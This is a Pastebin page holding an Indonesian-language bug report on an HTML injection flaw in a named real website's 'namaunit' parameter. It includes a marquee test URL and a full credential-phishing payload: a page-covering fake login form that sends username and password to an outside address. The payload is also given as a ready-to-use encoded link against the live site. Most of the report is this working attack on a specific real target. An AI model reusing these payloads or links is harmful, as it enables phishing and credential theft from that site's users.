API tools faq
paste
Advertisement
Khatulistiwa

HTML injection - p2apst.pln.co.id

Khatulistiwa
May 14th, 2019
131
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.38 KB | None | 0 0
raw download clone embed print report
  1. Bug type : HTML Injection
  2. Bug founder : Muhammad Bayu Juhri
  3. Bug level : Medium
  4. Link referensi :
  5. https://www.hackingarticles.in/beginner-guide-html-injection/
  6. https://www.owasp.org/index.php/Testing_for_HTML_Injection_(OTG-CLIENT-003)
  7.  
  8. Proof of Concept :
  9.  
  10. 1. Buka URL di bawah ini
  11.  
  12. https://p2apst.pln.co.id/dacen/modules/lpb/laporan/BelumBeliToken5Daftar.php?kddis=53&kdarea=CMI&kdunit=53595&namaunit=UPJ RAJAMANDALA
  13.  
  14. 2. Parameter yang vuln terhadap HTML Injection adalah "namaunit". Masukkan kode HTML pada parameter "namaunit". Sebagai contoh saya akan memasukkan <marquee>Bayu</marquee>
  15.  
  16. https://p2apst.pln.co.id/dacen/modules/lpb/laporan/BelumBeliToken5Daftar.php?kddis=53&kdarea=CMI&kdunit=53595&namaunit=<marquee>Bayu</marquee>
  17.  
  18. 3. Tag <marquee> berhasil dijalankan.
  19.  
  20. 4. Untuk eksploitasi lebih lanjut, saya bisa mengupload form login untuk mengelabui orang lain. Sebagai contoh saya menggunakan kode di bawah ini
  21.  
  22. <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Masukkan username dan password anda!<br><form name="login" action="//192.168.0.0/login.php"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
  23.  
  24. 5. Berikut URL lengkapnya di bawah ini
  25.  
  26. https://p2apst.pln.co.id/dacen/modules/lpb/laporan/BelumBeliToken5Daftar.php?kddis=53&kdarea=CMI&kdunit=53595&namaunit=%3Cdiv%20style=%22position:%20absolute;%20left:%200px;%20top:%200px;%20width:%201900px;%20height:%201300px;%20z-index:%201000;%20background-color:white;%20padding:%201em;%22%3EMasukkan%20username%20dan%20password%20anda!%3Cbr%3E%3Cform%20name=%22login%22%20action=%22//192.168.0.0/login.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22text%22%20name=%22username%22/%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22text%22%20name=%22password%22/%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%20align=center%3E%3Cinput%20type=%22submit%22%20value=%22Login%22/%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E
  27.  
  28. Impact :
  29. Seseorang dapat mengelabui orang lain dengan memanipulasi halaman situs tersebut. Sebagai contoh dapat menggunakan form upload seperti yang saya gunakan di atas.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!